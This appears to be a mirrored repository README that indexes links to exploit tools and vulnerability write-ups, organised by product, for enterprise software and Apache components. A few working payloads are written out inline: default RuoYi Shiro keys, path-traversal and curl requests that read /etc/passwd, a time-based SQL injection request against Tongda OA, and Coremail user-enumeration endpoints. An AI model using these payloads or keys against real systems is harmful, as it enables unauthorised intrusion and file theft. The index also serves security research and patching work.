# FrameVul **Repository Path**: J_tonight/FrameVul ## Basic Information - **Project Name**: FrameVul - **Description**: No description available - **Primary Language**: Unknown - **License**: Not specified - **Default Branch**: main - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 1 - **Forks**: 0 - **Created**: 2023-11-16 - **Last Updated**: 2024-04-02 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README # FrameVul ## 综合 - [主流供应商的一些攻击性漏洞汇总](https://github.com/r0eXpeR/supplier) - [2021_Hvv漏洞](https://github.com/hhroot/2021_Hvv) - [2022年Java应用程序的CVE漏洞](https://github.com/HackJava/CVE2022) - [漏洞库合集](https://github.com/cckuailong/vulbase) - [公开的信息、漏洞利用、脚本](https://github.com/pedrib/PoC) - [Goby POC](https://github.com/aetkrad/goby_poc) - [nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) - [LiqunKit_](https://github.com/Liqunkit/LiqunKit_) - [强化fscan的漏扫POC库](https://github.com/chaosec2021/fscan-POC) - [在渗透测试中快速检测常见中间件、组件的高危漏洞。](https://github.com/1120362990/vulnerability-list) - [OAExploit一款基于产品的一键扫描工具](https://github.com/achuna33/MYExploit) - [批量扫描破解海康威视、大华等摄像头的常见漏洞。](https://github.com/WhaleFell/CameraHack) - [网络摄像头漏洞检测脚本.Nmap (Nse Nmap script engine)](https://github.com/foggyspace/NsePocsuite-lua) - [网络摄像头漏洞扫描工具 | Webcam vulnerability scanning tool](https://github.com/jorhelp/Ingram) ## 1Panel [1Panel loadfile 后台文件读取漏洞](https://peiqi.wgpsec.org/wiki/webapp/1Panel/1Panel%20loadfile%20%E5%90%8E%E5%8F%B0%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html) ## 宝塔 [宝塔面板Windows版提权方法](https://github.com/Hzllaga/BT_Panel_Privilege_Escalation) [宝塔linux面板 <6.0 存储形xss](https://mp.weixin.qq.com/s/gtYyyhye90ZPILWCGsGKGQ) ## 辰信领创 [辰信景云终端安全管理系统 login存在 SQL注入漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E8%BE%B0%E4%BF%A1%E9%A2%86%E5%88%9B/%E8%BE%B0%E4%BF%A1%E9%A2%86%E5%88%9B%20%E8%BE%B0%E4%BF%A1%E6%99%AF%E4%BA%91%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html) ## 钉钉 [钉钉RCE](https://github.com/crazy0x70/dingtalk-RCE) ## 亿邮电子邮件系统 [(CNVD-2021-26422)亿邮电子邮件系统 远程命令执行漏洞](https://github.com/Henry4E36/eyouRCE) ## 泛微OA [泛微OA某版本的SQL注入漏洞](https://github.com/Wrin9/weaverOA_sql_injection) [应用安全 - 软件漏洞 - 泛微OA漏洞汇总](https://www.cnblogs.com/AtesetEnginner/p/11558469.html) [泛微 e-mobile 相关漏洞](https://mp.weixin.qq.com/s/nYTXWXs-40oR41k1UsHJyw) [z1un/weaver_exp](https://github.com/z1un/weaver_exp) [关于表达式注入的小记录](https://zhuanlan.zhihu.com/p/26052235) [泛微 E-Mobile Ognl 表达式注入](https://blog.csdn.net/qq_27446553/article/details/68203308) [泛微e-cology7.1 SOAP注入引发的血案](https://www.mrwu.red/web/1598.html) [泛微协同商务系统e-cology某处SQL注入](https://www.uedbox.com/post/14232/) [泛微e-cology OA Beanshell组件远程代码执行漏洞复现](https://mp.weixin.qq.com/s/LpXiLukOKMfMSa8gUYBqNA) [ecology8_mobile_sql_inject](https://github.com/orleven/Tentacle/blob/6e1cecd52b10526c4851a26249339367101b3ca2/script/ecology/ecology8_mobile_sql_inject.py) [泛微E-Cology WorkflowServiceXml RCE](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/泛微OA/泛微E-Cology%20WorkflowServiceXml%20RCE.html?h=泛微E-Cology%20WorkflowServiceXml%20RCE) [泛微OA weaver.common.Ctrl 任意文件上传漏洞](https://mp.weixin.qq.com/s/ePYRFPfu-pvWMKSiffporA) [泛微OA 前台GetShell复现](https://ailiqun.xyz/2021/05/02/泛微OA-前台GetShell复现/) [泛微e-cology任意文件上传(已修复)](https://mp.weixin.qq.com/s/3ip7-U8BsWgq3N4SP5xd4w) [泛微e-cology另一接口任意文件上传(已修复)](https://mp.weixin.qq.com/s/nRnNyFfDQYxmFwA-7-IBVQ) [OfficeServer 文件上传](https://github.com/sobinge/2022-HW-POC/blob/main/泛微OA%20uploaderOperate.jsp%20文件上传.md) [E-office Server_v9.0 漏洞分析](https://mp.weixin.qq.com/s/JP-kIsWeQ0HZPs9jZjL24A) [某 E-Office v9 任意文件上传漏洞复现](https://www.o2oxy.cn/3860.html) [bigsizeme/CNVD-2021-49104](https://github.com/bigsizeme/CNVD-2021-49104) [泛微oa漏洞利用工具](https://github.com/TD0U/WeaverScan) [组合利用泛微信息泄漏漏洞和任意用户登录漏洞,可获取全部loginId并测试登录](https://github.com/A0WaQ4/Weaver_ofslogin_vul) [泛微移动管理平台E-mobile lang2sql接口存在任意文件上传](https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247484476&idx=1&sn=2eeef68570e6ab7d8a2789e07b8609ad) ## 帆软报表 [帆软报表v8.0 Getshell漏洞分析](http://foreversong.cn/archives/1378) [帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757](https://mp.weixin.qq.com/s/ae8A8PGJCtr6uS11dRpzcw) [帆软 V9 getshell](https://www.o2oxy.cn/3368.html) ## 飞企互联 [飞企互联 FE业务协作平台 ShowImageServlet 任意文件读取漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E9%A3%9E%E4%BC%81%E4%BA%92%E8%81%94/%E9%A3%9E%E4%BC%81%E4%BA%92%E8%81%94%20FE%E4%B8%9A%E5%8A%A1%E5%8D%8F%E4%BD%9C%E5%B9%B3%E5%8F%B0%20ShowImageServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html) ## 汉得SRM [汉得SRM tomcat.jsp 登陆绕过漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E6%B1%89%E5%BE%97/%E6%B1%89%E5%BE%97SRM%20tomcat.jsp%20%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.html) ## 华天动力-OA [CVE-2021-45897 全球最大CRM系统SuiteCRM远程命令执行漏洞分析与复现](https://mp.weixin.qq.com/s/KVVgiECEr7ivBfXnByi5RQ) ## 金蝶云星空 [金蝶云星空任意文件上传漏洞](https://blog.csdn.net/qq_41904294/article/details/134204734) ## 金盘 微信管理平台 [金盘 微信管理平台 getsysteminfo 未授权访问漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E9%87%91%E7%9B%98/%E9%87%91%E7%9B%98%20%E5%BE%AE%E4%BF%A1%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20getsysteminfo%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.html) ## 金山终端安全系统 [金山终端安全系统V9.0SQL注入漏洞](https://github.com/luck-ying/Library-POC/blob/40f8d4051a239ac9b49c77ea0152c394e8b38acb/%E9%87%91%E5%B1%B1%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F/%E9%87%91%E5%B1%B1%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9FV9.0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.py) ## 蓝凌OA [yuanhaiGreg/LandrayExploit](https://github.com/yuanhaiGreg/LandrayExploit) [ 蓝凌OA的前后台密码的加解密工具](https://github.com/zhutougg/LandrayDES) [蓝凌OA custom.jsp 任意文件读取漏洞](https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw) [蓝某OA前台SSRF进一步利用到RCE](https://mp.weixin.qq.com/s/fNovp4mbKIMkVdF2ywcQcQ) [蓝凌 OA treexml.tmpl script 远程代码执行漏洞](https://github.com/tangxiaofeng7/Landray-OA-Treexml-Rce) [蓝凌EIS saveIm文件上传](https://github.com/MzzdToT/HAC_Bored_Writing/blob/main/Fileupload/%E8%93%9D%E5%87%8CEIS/EIS_upload.py) ## 联软准入系统 [联软准入系统任意文件上传](https://www.hedysx.com/2627.html) ## 绿盟 NF下一代防火墙 [绿盟 NF下一代防火墙 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E7%BB%BF%E7%9B%9F/%E7%BB%BF%E7%9B%9F%20NF%E4%B8%8B%E4%B8%80%E4%BB%A3%E9%98%B2%E7%81%AB%E5%A2%99%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) ## 企望制造 ERP [企望制造 ERP comboxstore.action 远程命令执行漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E4%BC%81%E6%9C%9B/%E4%BC%81%E6%9C%9B%E5%88%B6%E9%80%A0%20ERP%20comboxstore.action%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html) ## 锐捷 [锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/iot/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7%20NBR%20%E8%B7%AF%E7%94%B1%E5%99%A8%20fileupload.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) [锐捷 BCR商业无线云网关 后台命令执行漏洞](https://peiqi.wgpsec.org/wiki/iot/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7%20BCR%E5%95%86%E4%B8%9A%E6%97%A0%E7%BA%BF%E4%BA%91%E7%BD%91%E5%85%B3%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html) ## 若依 默认Key ``` fCq+/xW488hMTCD+cmJ3aQ== zSyK5Kp6PZAAjlT+eeNMlg== ``` 后台任意文件读取 - RuoYi <= v4.5.0 ``` /common/download/resource?resource=/profile/../../../../etc/passwd ``` Druid 未授权访问 ``` /prod-api/druid/index.html ``` [若依后台定时任务一键利用](https://github.com/passer-W/Ruoyi-All) [Xcheck Java引擎漏洞挖掘&防护识别](https://mp.weixin.qq.com/s/FPMUVoSqc0Lsf5BQx07ADw) [记一次若依cms后台getshell](https://bkfish.gitee.io/2021/06/26/记一次若依cms后台getshell/) [用于windows反弹shell的yaml-payload](https://github.com/bkfish/yaml-payload-for-Win) [若依CMS4.6.0后台RCE](https://www.cnblogs.com/r00tuser/p/14693462.html) [若依CMS后台getshell](http://www.yongsheng.site/2021/08/31/若依CMS后台getshell/) ## 深信服 Sangfor [深信服 应用交付管理系统 login 远程命令执行漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html) ## 通达OA [通达OA多处SQL注入漏洞](https://mp.weixin.qq.com/s/DcwDz11f6g7uguuBGsin7A) [OA-HUNTER/TongDa-OA](https://github.com/OA-HUNTER/TongDa-OA) [ 通达OA综合利用工具](https://github.com/xinyu2428/TDOA_RCE) [python编写的多个通达常见漏洞exp](https://github.com/kitezzzGrim/tongda-exp) [通达OA V11.5电子邮箱接口SQL注入复现](https://mp.weixin.qq.com/s/3JtV-oVGIyzy9ly6n4fMiA) [通达OA任意文件上传和文件包含漏洞导致RCE详细代码审计分析及Poc构造复现](https://www.freebuf.com/column/230871.html) [jas502n/OA-tongda-RCE](https://github.com/jas502n/OA-tongda-RCE) [通达OA11.6 preauth RCE 0day分析](https://drivertom.blogspot.com/2020/08/oa116-preauth-rce-0day.html) [poc_and_exp/rce.py](https://github.com/TomAPU/poc_and_exp/blob/master/rce.py) [通达OA v11.7后台SQL注入到RCE 0day](https://mp.weixin.qq.com/s/rtX9mJkPHd9njvM_PIrK_Q) [通达OA v11.7 在线用户登录漏洞](https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ) [通达OA11.7 利用新思路(附EXP)](https://mp.weixin.qq.com/s/LJRI04VViL4hbt6dbmGHAw) [通达OA 后台getshell 新思路](https://www.o2oxy.cn/2738.html) [通达 OA 11.7 组合拳 RCE 利用分析](https://sec-in.com/article/921) [通达OA v11.8 存储型XSS 与 命令执行](https://www.tooltool.net/2710355.html) [通达 OA 代码审计篇二 :11.8 后台 Getshell](https://paper.seebug.org/1499/) [通达oa 11.8 后台getshell](https://github.com/z1un/TongdaOA-exp) [通达OA-V11.8-api-ali.php文件上传漏洞](https://www.cnblogs.com/hmesed/p/16195551.html) 通达OA v11.9 upsharestatus 后台SQL注入漏洞 ``` POST /general/appbuilder/web/portal/workbench/upsharestatus HTTP/1.1 Content-Type: application/x-www-form-urlencoded uid=15&status=1&id=1;select sleep(4) ``` [某知名OA高版本getshell思路(附部分脚本)](https://mp.weixin.qq.com/s/HU-KxA75PR3u47QOqKWktQ) [通达OA v11.10 sql注入漏洞复现](https://www.yulate.com/303.html) ## 网神 [网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞 ](https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) ## 网御 ACM上网行为管理系统 [网御 ACM上网行为管理系统 bottomframe.cgi SQL注入漏洞](https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E5%BE%A1%20ACM%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20bottomframe.cgi%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html) ## 万户OA - [户OA smartUpload.jsp 任意文件上传漏洞](https://anpaini.com/2022/OA产品漏洞/万户OA%20smartUpload.jsp%20任意文件上传漏洞/) ## 信呼 OA [信呼OA存储型XSS 0day复现](https://xz.aliyun.com/t/7887) ## 用友NC [用友nc数据库密码解密](https://github.com/jas502n/ncDecode) [kezibei/yongyou_nc_poc](https://github.com/kezibei/yongyou_nc_poc) [用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/用友OA/用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923.html) [用友NC反序列化漏洞简单记录(DeleteServlet、XbrlPersistenceServlet等)](https://www.jianshu.com/p/14449a6edd05) [用友 NC XbrlPersistenceServlet反序列化](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/用友OA/用友 NC XbrlPersistenceServlet反序列化.html) [某C 1day 反序列化漏洞的武器级利用](https://mp.weixin.qq.com/s/IdXYbjNVGVIasuwQH48Q1w) [用友NC任意文件上传漏洞复现](https://www.adminxe.com/2075.html) [用友nc 反序列化回显构造思路](https://zhzhdoai.github.io/2020/09/17/某NC-反序列化回显构造/) [用友NC反序列化 简单分析](https://blog.sari3l.com/posts/608d18f0/) [CNVD-2022-60632 畅捷通任意文件上传漏洞复现](https://www.o2oxy.cn/4104.html) [用友 NC Cloud jsinvoke 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20NC%20Cloud%20jsinvoke%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) [用友 移动管理系统 uploadApk.do 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20%E7%A7%BB%E5%8A%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20uploadApk.do%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) [用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html) [用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) ## 致远OA [致远OA管理员密码的重置](https://blog.csdn.net/qq_33064191/article/details/119921106) [数据库Pass解密](https://github.com/Rvn0xsy/PassDecode-jar) [Seeyon A8 登录hash破解案例](https://www.hedysx.com/2807.html) [Summer177/seeyon_exp](https://github.com/Summer177/seeyon_exp) [nex121/SeeyonEXP](https://github.com/nex121/SeeyonEXP) [致远OA帆软报表组件反射型XSS&SSRF漏洞](https://landgrey.me/blog/7/) [致远OA帆软报表组件前台XXE漏洞挖掘过程](https://landgrey.me/blog/8/) [致远A8协同办公系统poc/seeyon 0day](https://www.jianshu.com/p/562f45edde2d) [致远 OA A8 htmlofficeservlet getshell (POC&EXP)](http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/) [致远OA任意管理员登陆漏洞分析](https://mp.weixin.qq.com/s/tWKCgmptOsouOllDSXBTiw) [致远OA ajax.do登录绕过任意文件上传](https://mp.weixin.qq.com/s/dk6aZY2fuJ_08tSOOh1Vzw) [致远OA ajaxAction formulaManager 文件上传漏洞](https://mp.weixin.qq.com/s/ZyPwCytO7NLUuo9rfKtgyQ) [致远OA fastjson远程代码执行漏洞复现](https://mp.weixin.qq.com/s/a1KbLlb7ZOXfeXUyhLhpMw) [致远伪0day_FastJson利用链](https://mp.weixin.qq.com/s/yTuQLqqvikwo1KfK-zGBBA) [致远 OA FastJson rce 回显](https://96.mk/2021/07/10/19.html) [致远oa xxe getshell分析(附脚本)](https://mp.weixin.qq.com/s/efuMlGrjYsUjP7nP3W2F4w) ## 浙大恩特客户资源管理系统 [浙大恩特客户资源管理系统fileupload.jsp文件上传](https://mp.weixin.qq.com/s/8BpPzi_7SfJWEQG5N988Mg) ## 74CMS [骑士 CMS 6.0.48以下文件包含getshell](https://mp.weixin.qq.com/s/erBzIapx1bz8f1ArWwwBwQ) ## Adminer [Adminer≤4.6.2任意文件读取漏洞](https://mp.weixin.qq.com/s/ZYGN8WceT2L-P4yF6Z8gyQ) ## Apache [利用最新Apache解析漏洞(CVE-2017-15715)绕过上传黑名单](https://www.leavesongs.com/PENETRATION/apache-cve-2017-15715-vulnerability.html) [Apache HTTPD 换行解析漏洞(CVE-2017-15715)](https://vulhub.org/#/environments/httpd/CVE-2017-15715/) [Apache SSI 远程命令执行漏洞](https://vulhub.org/#/environments/httpd/ssi-rce/) [Apache 提权漏洞(CVE-2019-0211)复现](https://paper.seebug.org/889/) [【最新漏洞预警】CVE-2021-40438-Apache httpd mod_proxy SSRF漏洞深入分析与复现](https://mp.weixin.qq.com/s/tYM6z9S1WZjPjfCt2MHOAQ) [Apache mod_proxy SSRF(CVE-2021-40438)的一点分析和延伸](https://mp.weixin.qq.com/s/sbFs7kZ8tExwZPeUvq1hJw) [CVE-2021-41773 | CVE-2021-42013 漏洞利用工具 (Apache/2.4.49-2.4.50)](https://github.com/CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit) [Apache任意文件读取补丁绕过(CVE-2021-42013)](https://mp.weixin.qq.com/s/UzKu4mze02umEhxJAJpp9g) [Apache2.4.50 CVE-2021-41773 cve-2021-42013 复现](https://www.o2oxy.cn/3740.html) ## Apache ActiveMQ [ActiveMQ系列漏洞汇总复现](https://mp.weixin.qq.com/s/5U7v22q2WeLmCnkq7mfr8w) [ActiveMQ 反序列化漏洞 (CVE-2015-5254)](https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md) [ActiveMQ任意文件写入漏洞 (CVE-2016-3088)](https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2016-3088/README.zh-cn.md) [ActiveMQ RCE](https://github.com/trganda/ActiveMQ-RCE) ## Apache Airflow [Mr-xn/CVE-2022-40127](https://github.com/Mr-xn/CVE-2022-40127) ## Apache APISIX [CVE-2022-24112 Apache APISIX apisix/batch-requests RCE](https://github.com/Mr-xn/CVE-2022-24112/blob/main/CVE-2022-24112.yaml) [Apisix dashboard未授权访问到rce,含发现poc思路&复现环境](https://mp.weixin.qq.com/s/knTotxOeFlzcxvoQYSljCQ) ## Apache Axis [Apache Axis1 与 Axis2 WebService 的漏洞利用总结](https://paper.seebug.org/1489/#2-apache-axis2) [axis 1.4 AdminService未授权访问 jndi注入利用](https://jianfensec.com/渗透测试/axis 1.4 AdminService未授权访问 jndi注入命令执行利用/) [KibodWapon/Axis-1.4-RCE-Poc](https://github.com/KibodWapon/Axis-1.4-RCE-Poc) [【漏洞复现】Axis2默认弱口令后台Getshell](https://mp.weixin.qq.com/s/Gp_FMM-n472wYTBA5lC3lw) ## Apache Druid [Apache Druid 漏洞总结](https://mp.weixin.qq.com/s/ZT5j9clfENsEWMSKuKkw1g) [Druid未授权(弱口令)的一些利用方式](https://www.cnblogs.com/cwkiller/p/12483223.html) [Druid未授权漏洞实战利用](https://www.t00ls.net/articles-62541.html) [yuyan-sec/druid_sessions](https://github.com/yuyan-sec/druid_sessions) [Apache Druid 远程代码执行漏洞 CVE-2021-25646](http://wiki.peiqi.tech/PeiQi_Wiki/Web服务器漏洞/Apache/Apache Druid/Apache Druid 远程代码执行漏洞 CVE-2021-25646.html) [漏洞复现: Apache Druid 远程代码执行漏洞 (CVE-2021-25646)](https://paper.seebug.org/1476/) [Apache Druid CVE-2021-26919 漏洞分析](http://m0d9.me/2021/04/21/Apache-Druid-CVE-2021-26919-漏洞分析/) CVE-2021-36749 ```sh curl http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect -H "Content-Type:application/json" -X POST -d "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}" ``` ## Apache Dubbo [Apache Dubbo (CVE-2023-23638)漏洞利用的工程化实践](https://github.com/YYHYlh/Apache-Dubbo-CVE-2023-23638-exp) ## Apache Flink [CVE-2020-17518&17519:Flink两个漏洞复现](https://mp.weixin.qq.com/s/9xLQ1YAWVtHBv9qVk-Xc1A) [漏洞复现|Apache Flink(CVE-2020-17519)漏洞分析](https://mp.weixin.qq.com/s/6Z7ilX_bwSBU8EWfStAc5w) ## Apache Kylin [CVE-2021-45456 apache kylin命令执行](https://github.com/Awrrays/Awrrays-Team-VulLab/blob/main/Middleware/apache/Apache Kylin/CVE-2021-45456.md) ## Apache Solr [Solr RCE 整理](https://github.com/Imanfeng/Apache-Solr-RCE) [Apache Solr 注入研究](https://github.com/veracode-research/solr-injection) [Apache solr XML 实体注入漏洞 (CVE-2017-12629)](https://vulhub.org/#/environments/solr/CVE-2017-12629-XXE/) [Apache Solr 远程命令执行漏洞 (CVE-2017-12629)](https://vulhub.org/#/environments/solr/CVE-2017-12629-RCE/) https://github.com/mpgn/CVE-2019-0192/ [Apache Solr 远程命令执行漏洞 (CVE-2019-0193)](https://vulhub.org/#/environments/solr/CVE-2019-0193/) [Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析](https://paper.seebug.org/1009/) [jas502n/CVE-2019-0193](https://github.com/jas502n/CVE-2019-0193) [Apache Solr不安全配置远程代码执行漏洞复现及jmx rmi利用分析](https://mp.weixin.qq.com/s/P626BC3-JcBc3ewdlslO2w) [jas502n/CVE-2019-12409](https://github.com/jas502n/CVE-2019-12409) [Apache Solr最新漏洞复现](https://xz.aliyun.com/t/6679) [Microsoft Apache Solr RCE Velocity Template | Bug Bounty POC](https://blog.securitybreached.org/2020/03/31/microsoft-rce-bugbounty/) [Apache Solr Velocity RCE 真的getshell了吗?](https://www.hayasec.me/2019/11/06/apache-solr-velocity-rce-getshell/) [Solr 模板注入漏洞图形化一键检测工具](https://github.com/SDNDTeam/CVE-2019-17558_Solr_Vul_Tool) [CVE-2020-13957:Apche Solr 未授权上传漏洞复现](https://mp.weixin.qq.com/s/EbNK_PQZwgR6K31HwjAVRQ) [CVE-2020-13957 Apache Solr 未授权上传漏洞](https://mp.weixin.qq.com/s/5iwk08z3oP9Tim5ETBIBBg) [CVE-2020-13957:Apache Solr 未授权上传漏洞复现](https://mp.weixin.qq.com/s/1I-EwYWMnlsLsVf67F3G1w) [Solr任意文件读取漏洞环境搭建和复现](https://mp.weixin.qq.com/s/1AYen3qZMhiiym_wJh5lzw) [Apache Solr<= 8.8.2 (最新) 任意文件删除](https://mp.weixin.qq.com/s/dECH74n5qjrWT9lok8IkPQ) [Henry4E36/Solr-SSRF](https://github.com/Henry4E36/Solr-SSRF) ## Apache SuperSet [CVE-2023-27524 的基本 PoC:Apache Superset 中的不安全默认配置](https://github.com/horizon3ai/CVE-2023-27524) ## Big-IP [BIG-IP iCONTROL REST AUTH BYPASS RCE POC CVE-2022-1388](https://github.com/TomArni680/CVE-2022-1388-POC) ## Coremail 版本信息 ``` /coremail/s/json?func=verify ``` 爆破用户名 ``` /coremail/s?func=user:getLocaleUserName { "email":"zhangsan" "defaultURL":"1" } ``` [导出coremail通讯录](https://github.com/newcodor/coremail_address_list_export) [Coremail漏洞](https://github.com/HackJava/HackCoremail) [Coremail邮件系统组织通讯录一键导出](https://github.com/dpu/coremail-address-book) [Coremail nday 任意密码修改复现](https://mp.weixin.qq.com/s/YZwMvWiqVNh5Locf-eBCVw) [yuxiaoyou123/coremail-exp](https://github.com/yuxiaoyou123/coremail-exp) [coremail漏洞之我见(碎碎念)](https://mp.weixin.qq.com/s/q6VUmRxBPLKT35qPHr4gSw) [jimoyong/CoreMailUploadRce](https://github.com/jimoyong/CoreMailUploadRce) ## Confluence [Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具](https://github.com/ad-calcium/CVE-2023-22515) [CVE-2022-26134 概念证明](https://github.com/jbaines-r7/through_the_wire) [CVE-2022-26134-Godzilla-MEMSHELL](https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL) [Confluence 文件读取漏洞(CVE-2019-3394)分析](https://paper.seebug.org/1025/) [Confluence 未授权 RCE (CVE-2019-3396) 漏洞分析](https://paper.seebug.org/884/) [Yt1g3r/CVE-2019-3396_EXP](https://github.com/Yt1g3r/CVE-2019-3396_EXP) [CVE-2021-26084-Confluence命令执行 全版本内存马注入](https://mp.weixin.qq.com/s/wbIvFQmkdJH6g6ZKBFXyYQ) [alt3kx/CVE-2021-26084_PoC](https://github.com/alt3kx/CVE-2021-26084_PoC) ## DedeCMS [织梦全版本漏洞扫描工具](https://github.com/lengjibo/dedecmscan) [解决DEDECMS历史难题--找后台目录](https://xz.aliyun.com/t/2064) [Dedecms 最新版漏洞收集并复现学习](https://blog.szfszf.top/article/25/) [Chasing a Dream :: Pre-authenticated Remote Code Execution in Dedecms](https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html) [DedeCMS 未授权RCE漏洞原理及影响面分析](https://mp.weixin.qq.com/s/KZ7O0JRLvk4_O1GvL5lMVw) [Dedecms GetCookie Type Juggling Authentication Bypass Vulnerability](https://srcincite.io/pocs/src-2021-0029.py.txt) ## Django [CVE-2020-7471 Django StringAgg SQL Injection漏洞复现](https://mp.weixin.qq.com/s/j4OL927w3JtL1k2hFvmffw) ## Discuz [Discuz漏洞整理.pdf](https://github.com/Awrrays/Pentest-Tips/blob/main/Discuz%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86.pdf) [Discuz!X 前台任意文件删除漏洞深入解析](https://xz.aliyun.com/t/34) [Discuz!因Memcached未授权访问导致的RCE](https://xz.aliyun.com/t/2018) [Discuz!X 个人账户删除漏洞](https://xz.aliyun.com/t/2297) 